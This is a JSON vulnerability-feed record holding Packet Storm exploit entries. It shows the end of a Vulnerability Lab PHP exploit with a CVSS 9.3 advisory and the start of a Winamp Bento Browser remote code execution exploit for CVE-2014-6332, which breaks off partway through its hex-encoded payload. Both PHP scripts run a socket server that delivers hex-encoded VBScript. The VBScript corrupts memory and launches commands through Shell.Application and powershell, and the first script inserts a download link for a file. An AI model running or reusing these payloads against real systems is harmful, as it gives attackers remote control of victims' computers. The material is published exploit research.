\n\"\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6a\\x3d\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6e\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x30\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\". \n\"\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2b\\x32\\x29\\x28\". \n\"\\x69\\x2b\\x26\\x68\\x31\\x31\\x63\\x2b\\x6b\\x29\\x3d\\x61\\x62\\x28\\x34\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\". \n\"\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x30\\x20\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x26\\x68\". \n\"\\x31\\x32\\x30\\x2b\\x6b\\x29\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6f\\x72\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x6e\\x65\\x78\\x74\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3d\\x31\\x2e\\x36\\x39\\x37\". \n\"\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2d\\x33\\x31\\x33\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x75\". \n\"\\x6e\\x6d\\x75\\x6d\\x61\\x61\\x28\\x29\\x20\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x4f\\x76\\x65\\x72\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\". \n\"\\x20\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x64\\x69\\x6d\\x20\\x74\\x79\\x70\\x65\\x31\\x2c\\x74\\x79\\x70\\x65\\x32\\x2c\\x74\\x79\\x70\\x65\\x33\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x76\\x65\\x72\\x3d\\x46\\x61\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x30\". \n\"\\x3d\\x61\\x30\\x2b\\x61\\x33\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x31\\x3d\\x61\\x30\\x2b\\x32\\x0d\\x0a\\x20\\x20\\x20\". \n\"\\x20\\x61\\x32\\x3d\\x61\\x30\\x2b\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\". \n\"\\x29\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\". \n\"\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\". \n\"\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x74\". \n\"\\x79\\x70\\x65\\x31\\x3d\\x31\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x31\\x2e\\x31\\x32\\x33\\x34\". \n\"\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\". \n\"\\x39\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3d\\x31\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4f\\x62\\x6a\\x65\\x63\\x74\\x28\". \n\"\\x61\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x20\\x3d\\x20\\x46\\x61\\x6c\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6e\\x0d\". \n\"\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x3c\\x34\\x29\". \n\"\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6d\\x65\\x6d\\x3d\\x63\\x69\". \n\"\\x6e\\x74\\x28\\x61\\x30\\x2b\\x31\\x29\\x2a\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\". \n\"\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\". \n\"\\x28\\x6a\\x3d\\x6d\\x65\\x6d\\x2b\\x34\\x29\\x20\\x6f\\x72\\x20\\x28\\x6a\\x2a\\x38\\x3d\\x6d\\x65\\x6d\\x2b\\x38\\x29\". \n\"\\x29\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\". \n\"\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x3c\\x3e\\x30\\x29\\x20\\x20\". \n\"\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4f\\x62\\x6a\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3d\". \n\"\\x20\\x46\\x61\\x6c\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\". \n\"\\x79\\x70\\x65\\x31\\x3d\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\". \n\"\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\". \n\"\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\". \n\"\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x3c\\x3e\\x30\\x29\\x20\". \n\"\\x20\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x49\\x66\\x28\\x49\\x73\\x4f\\x62\\x6a\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3d\\x20\\x46\". \n\"\\x61\\x6c\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3d\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\". \n\"\\x61\\x31\\x29\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\". \n\"\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\". \n\"\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x49\". \n\"\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3d\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4f\\x76\\x65\\x72\\x3d\\x54\\x72\". \n\"\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x45\\x6e\\x64\\x20\\x49\\x66\\x20\\x20\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3d\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\". \n\"\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4f\\x76\\x65\\x72\\x3d\\x54\\x72\\x75\\x65\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6e\\x39\\x78\\x3d\\x31\\x0d\\x0a\\x20\\x20\\x20\\x20\\x45\". \n\"\\x6e\\x64\\x20\\x49\\x66\\x20\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\". \n\"\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\". \n\"\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x72\\x75\\x6d\\x28\\x61\\x64\\x64\\x29\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\". \n\"\\x78\\x74\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\". \n\"\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\". \n\"\\x3d\\x30\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3d\\x61\\x64\\x64\\x2b\\x34\\x20\". \n\"\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x31\\x2e\\x36\\x39\\x37\\x35\\x39\\x36\". \n\"\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2d\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x72\\x75\\x6d\\x3d\\x6c\\x65\\x6e\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\". \n\"\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0d\\x0a\\x65\\x6e\\x64\". \n\"\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x3c\\x2f\\x62\\x6f\\x64\\x79\\x3e\\x0d\\x0a\\x3c\\x2f\\x68\\x74\\x6d\\x6c\\x3e\"; \n$msgd=str_replace(\"FILE_DOWNLOAD\",$link,$msgd); \n \nfor (;;) { \nif ($client = @socket_accept($reza)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n \n \nSecurity Risk: \n============== \nThe security risk of the security vulnerability in the html hta application is estimated as high. (CVSS 9.3) \n \n \nCredits & Authors: \n================== \nAuthor: Mohammad Reza Espargham \nLinkedin: https://ir.linkedin.com/in/rezasp \nE-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \nWebsite: www.reza.es \nTwitter: https://twitter.com/rezesp \nFaceBook: https://www.facebook.com/mohammadreza.espargham \n \n \nDisclaimer & Information: \n========================= \nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either \nexpressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers \nare not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even \nif Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation \nof liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break \nany vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. \n \nDomains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com \nContact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com \nSection: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com \nSocial: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab \nFeeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php \nPrograms: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ \n \nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. \n \nCopyright \u00a9 2014 | Vulnerability Laboratory [Evolution Security] \n \n \n \n-- \nVULNERABILITY LABORATORY - RESEARCH TEAM \nSERVICE: www.vulnerability-lab.com \nCONTACT: research@vulnerability-lab.com \nPGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133261/VL-1576.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:08", "description": "", "cvss3": {}, "published": "2015-10-26T00:00:00", "type": "packetstorm", "title": "Winamp Bento Browser Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-26T00:00:00", "id": "PACKETSTORM:134079", "href": "https://packetstormsecurity.com/files/134079/Winamp-Bento-Browser-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n/* ########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : Winamp Bento Browser - Remote Command Execution \n# Version : Winamp 5.666 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Date : 24 October 2015 \n# Download : http://www.filehorse.com/download-winamp/ \n# Website : http://winamp.com \n########################################################## \n# 1. run php code : php exploit.php \n# 2. get the output address and open it in browser ! \n########################################################## \n# Original Code : http://ehsann.info/exploit/6.txt \n# POC : http://ehsann.info/video/winamp_r_c_e.mp4 \n########################################################## \n*/ \n \nif(!$argv[1] || $argv[1] == \"-h\" || $argv[1] == \"help\" || $argv[1] == \"--help\" || $arv[1] == \"-help\"){ \nprint \" \n[+]Exploit Usage: \n \nphp exploit.php [COMMAND] [PORT] \n \n[+]Example: \n \nphp exploit.php notepad.exe 80 \n \n\"; \n \n} \nelse{ \nprint \" \n/ ___|___ _ __ ___ _ __ ___ __ _ _ __ __| | | ____|_ _____ ___ _ _| |_(_) ___ _ __ | ____|_ ___ __ | | ___ (_) |_ \n| | / _ \\| '_ ` _ \\| '_ ` _ \\ / _` | '_ \\ / _` | | _| \\ \\/ / _ \\/ __| | | | __| |/ _ \\| '_ \\ | _| \\ \\/ / '_ \\| |/ _ \\| | __| \n| |__| (_) | | | | | | | | | | | (_| | | | | (_| | | |___ > < __/ (__| |_| | |_| | (_) | | | | | |___ > <| |_) | | (_) | | |_ \n\\____\\___/|_| |_| |_|_| |_| |_|\\__,_|_| |_|\\__,_| |_____/_/\\_\\___|\\___|\\__,_|\\__|_|\\___/|_| |_| |_____/_/\\_\\ .__/|_|\\___/|_|\\__| \n|_| \\r\\n\"; \nif(!$argv[2] || !is_integer($argv[2])){ #check args \n$port=80; # Port Address \n} \nelse{ \n$port=$argv[2];# Port Address \n} \n$command = $argv[1]; \nprint \"Server is started on \" . \"localhost:\" . \"$port\\r\\n\"; # Start Exploit \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x